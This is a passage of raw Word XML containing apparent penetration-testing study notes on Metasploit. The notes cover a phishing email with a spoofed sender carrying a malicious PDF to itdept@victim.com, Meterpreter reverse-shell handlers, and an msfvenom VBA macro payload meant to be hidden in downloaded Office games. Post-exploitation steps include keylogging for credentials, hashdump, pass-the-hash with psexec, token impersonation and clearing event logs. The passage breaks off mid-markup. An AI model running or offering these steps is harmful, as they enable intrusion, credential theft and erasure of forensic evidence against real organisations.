    <w:p w14:paraId="1BE58168" w14:textId="5EAF74BF" w:rsidR="001625BE" w:rsidRDefault="001625BE" w:rsidP="001625BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1EACF7" w14:textId="4A2DFEC1" w:rsidR="001625BE" w:rsidRDefault="001625BE" w:rsidP="001625BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set LPORT (same as exploit in PDF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4558AEF4" w14:textId="113D1DB7" w:rsidR="001625BE" w:rsidRDefault="001625BE" w:rsidP="001625BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set LHOST</w:t>
      </w:r>
      <w:r w:rsidR="006A0923">
        <w:t xml:space="preserve"> (same as exploit in PDF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3C8487" w14:textId="70A9B52B" w:rsidR="001625BE" w:rsidRDefault="001625BE" w:rsidP="001625BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39981B99" w14:textId="09DA5450" w:rsidR="006A0923" w:rsidRDefault="006A0923" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use sendEmail script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E14852" w14:textId="7300A0EF" w:rsidR="006A0923" w:rsidRDefault="006A0923" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0923">
        <w:t>sendEmail -t itdept@victim.com -f techsupport@bestcomputers.com -s 192.168.8.131 -u Important Upgrade Instructions -a /tmp/BestComputers-UpgradeInstructions.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2AE1F6" w14:textId="119819A8" w:rsidR="006A0923" w:rsidRDefault="006A0923" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>attach the malicious pdf, use any smtp server we want and write a pretty convincing email from any address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131CEE78" w14:textId="2C936AE2" w:rsidR="006A0923" w:rsidRDefault="006A0923" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-f means FROM address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E78202B" w14:textId="67A8A39B" w:rsidR="006A0923" w:rsidRDefault="006A0923" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-t means TO address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B99678C" w14:textId="7CF31B18" w:rsidR="006A0923" w:rsidRDefault="006A0923" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-s means any SMTP server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15635F28" w14:textId="4DC160A0" w:rsidR="006A0923" w:rsidRDefault="006A0923" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-u means Titles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA4C042" w14:textId="06B3FE05" w:rsidR="006A0923" w:rsidRDefault="006A0923" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-a means attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4224AF07" w14:textId="43D97EC4" w:rsidR="006A0923" w:rsidRDefault="006A0923" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>enter any message desired then CTRL+D to send</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E0F7A1" w14:textId="5861FFEC" w:rsidR="006A0923" w:rsidRDefault="006A0923" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Once shell is established, migrate to another process before adobe is killed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A3D361" w14:textId="29EF8C1F" w:rsidR="006A0923" w:rsidRDefault="006A0923" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>in meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DF5A46" w14:textId="1D54640D" w:rsidR="006A0923" w:rsidRDefault="006A0923" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498F15D9" w14:textId="5E74CEA9" w:rsidR="006A0923" w:rsidRDefault="006A0923" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run post/windows/manage/migrate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42290CD3" w14:textId="36DF5348" w:rsidR="006A0923" w:rsidRDefault="006A0923" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308AC5D4" w14:textId="5F61BE62" w:rsidR="006A0923" w:rsidRDefault="006A0923" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use priv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D19D14" w14:textId="42A432F2" w:rsidR="006A0923" w:rsidRDefault="006A0923" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run post/windows/capture/keylog_recorder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30434402" w14:textId="5F814334" w:rsidR="006A0923" w:rsidRDefault="006A0923" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>in attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFC0CCF" w14:textId="60D41904" w:rsidR="006A0923" w:rsidRDefault="006A0923" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>cat file keylogger has been saved to to review credentials and other captured information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D090E9" w14:textId="26023035" w:rsidR="006A0923" w:rsidRDefault="006A0923" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>VBScript Infection Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F14540" w14:textId="076C72AF" w:rsidR="006A0923" w:rsidRDefault="006A0923" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>infect Word and Excel documents with malicious Metasploit Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66785360" w14:textId="6DF9A7B6" w:rsidR="006A0923" w:rsidRDefault="006A0923" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>create VBScript Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AB89B3" w14:textId="77777777" w:rsidR="00A90467" w:rsidRDefault="00A90467" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A90467">
        <w:t>msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=8080 -e x86/shikata_ga_nai -f vba-exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACC6D56" w14:textId="77777777" w:rsidR="00A90467" w:rsidRDefault="00A90467" w:rsidP="006A0923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>two part script is created – macro and document embedded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107AF76D" w14:textId="77777777" w:rsidR="00A90467" w:rsidRDefault="00A90467" w:rsidP="00A90467">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>transfer script over to machine with windows and office installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1E5A8A" w14:textId="77777777" w:rsidR="00A90467" w:rsidRDefault="00A90467" w:rsidP="00A90467">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Word/Excel 2003 </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tools </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Macros </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Visual Basic Editor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5060D7" w14:textId="77777777" w:rsidR="00A90467" w:rsidRDefault="00A90467" w:rsidP="00A90467">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Word/Excel 2007 </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> View Macros </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> name and create</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049A2EF4" w14:textId="77777777" w:rsidR="00A90467" w:rsidRDefault="00A90467" w:rsidP="00A90467">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>opens up VB Editor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8B3533" w14:textId="77777777" w:rsidR="00A90467" w:rsidRDefault="00A90467" w:rsidP="00A90467">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>paste output of first portion of payload script into the editor and save it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B0E0B0" w14:textId="77777777" w:rsidR="00A90467" w:rsidRDefault="00A90467" w:rsidP="00A90467">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>paste the remainder of the script into the word document itself</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA3DCF1" w14:textId="295904DF" w:rsidR="006A0923" w:rsidRDefault="00A90467" w:rsidP="00A90467">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Try to embed code into one of many Word/Excel games available on internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90467">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571C9A22" w14:textId="736A5D55" w:rsidR="00A90467" w:rsidRDefault="00A90467" w:rsidP="00A90467">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>setup Metasploit listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528B8CD3" w14:textId="07250DAB" w:rsidR="00A90467" w:rsidRDefault="00A90467" w:rsidP="00A90467">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A90467">
        <w:t>msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.101; set LPORT 8080; run; exit -y"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338A0F38" w14:textId="76CF5634" w:rsidR="00A90467" w:rsidRDefault="00A90467" w:rsidP="00A90467">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>MSF POST EXPLOITATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2B092C" w14:textId="0117F713" w:rsidR="00B3529D" w:rsidRDefault="00B3529D" w:rsidP="00B3529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6E3ED7" w14:textId="51C9D236" w:rsidR="00B3529D" w:rsidRDefault="00B3529D" w:rsidP="00B3529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Meterpreter Script “getsystem” that will attempt to gain SYSTEM level privileges on remote system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46925070" w14:textId="257C7CFC" w:rsidR="00B3529D" w:rsidRDefault="00B3529D" w:rsidP="00B3529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use priv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D383A0" w14:textId="1C818BED" w:rsidR="00B3529D" w:rsidRDefault="00B3529D" w:rsidP="00B3529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>getsystem -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E1C87C" w14:textId="2C50A1BC" w:rsidR="00B3529D" w:rsidRDefault="00B3529D" w:rsidP="00B3529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Local Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C596F0F" w14:textId="27EACC8C" w:rsidR="00B3529D" w:rsidRDefault="00B3529D" w:rsidP="00B3529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6F93A9" w14:textId="75B5D50C" w:rsidR="00B3529D" w:rsidRDefault="00B3529D" w:rsidP="00B3529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use exploit/windows/local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBB246B" w14:textId="77165CBE" w:rsidR="00B3529D" w:rsidRDefault="00B3529D" w:rsidP="00B3529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>PSExec Pass The Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF0DD96" w14:textId="7A955BDE" w:rsidR="00B3529D" w:rsidRDefault="00B3529D" w:rsidP="00B3529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>psexec module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF24EC1" w14:textId="4D0BC7EC" w:rsidR="00B3529D" w:rsidRDefault="00B3529D" w:rsidP="00B3529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>after using fgdump, pwdump, cachedump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580189FD" w14:textId="7FD826AD" w:rsidR="00B3529D" w:rsidRDefault="00B3529D" w:rsidP="00B3529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run post/windows/gather/hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2250ACF7" w14:textId="5CE67AD5" w:rsidR="00B3529D" w:rsidRDefault="00B3529D" w:rsidP="00B3529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>search psexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110315DF" w14:textId="3D317509" w:rsidR="00B3529D" w:rsidRDefault="00B3529D" w:rsidP="00B3529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use exploit/windows/smb/psexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D63A965" w14:textId="7B1988EC" w:rsidR="00B3529D" w:rsidRDefault="00B3529D" w:rsidP="00B3529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Event Log Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA6D23A" w14:textId="20A398A4" w:rsidR="00B3529D" w:rsidRDefault="00604950" w:rsidP="00B3529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>scripts/meterpreter/winenum – clrevtlgs()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F237D68" w14:textId="216618A2" w:rsidR="00604950" w:rsidRDefault="00604950" w:rsidP="00B3529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>in Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CBC56F" w14:textId="4E17385F" w:rsidR="00604950" w:rsidRDefault="00604950" w:rsidP="00604950">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>irb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDA61E9" w14:textId="55C7CFCB" w:rsidR="00604950" w:rsidRDefault="00604950" w:rsidP="00604950">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>log = client.sys.eventlog.open(‘system’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7B7044" w14:textId="2C537333" w:rsidR="00604950" w:rsidRDefault="00604950" w:rsidP="00604950">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>log.clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18774119" w14:textId="473A9F57" w:rsidR="00604950" w:rsidRDefault="00604950" w:rsidP="00604950">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Incognito</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFF954A" w14:textId="7D7EB6CE" w:rsidR="00604950" w:rsidRDefault="00604950" w:rsidP="00604950">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Impersonates user tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0137E8A9" w14:textId="04A7D47E" w:rsidR="00604950" w:rsidRDefault="00604950" w:rsidP="00604950">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Delegate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358FA64A" w14:textId="42B3A14B" w:rsidR="00604950" w:rsidRDefault="00604950" w:rsidP="00604950">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Impersonate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003F8913" w14:textId="2C7DEDFE" w:rsidR="00604950" w:rsidRDefault="00604950" w:rsidP="00604950">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Often found in file servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761FF878" w14:textId="739BDEE4" w:rsidR="00604950" w:rsidRDefault="00604950" w:rsidP="00604950">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ms08_067_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC2C8CA" w14:textId="11BAF3EB" w:rsidR="00604950" w:rsidRDefault="00604950" w:rsidP="00604950">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2C2E1A" w14:textId="233A1CA4" w:rsidR="00604950" w:rsidRDefault="00604950" w:rsidP="00604950">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use incognito</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076984E4" w14:textId="016266E8" w:rsidR="00604950" w:rsidRDefault="00604950" w:rsidP="00604950">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>list_tokens -u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37127B45" w14:textId="2C33EA02" w:rsidR="00604950" w:rsidRDefault="00604950" w:rsidP="00604950">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>impersonate_token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA51828" w14:textId="6D5A00E0" w:rsidR="00604950" w:rsidRDefault="00604950" w:rsidP="00604950">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E08FC8" w14:textId="5D55DFDE" w:rsidR="00604950" w:rsidRDefault="00604950" w:rsidP="00604950">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Interacting With The Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427A2156" w14:textId="1A4FA987" w:rsidR="00604950" w:rsidRDefault="00604950" w:rsidP="00604950">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>reg command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D276486" w14:textId="22892F93" w:rsidR="00604950" w:rsidRDefault="00604950" w:rsidP="00604950">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
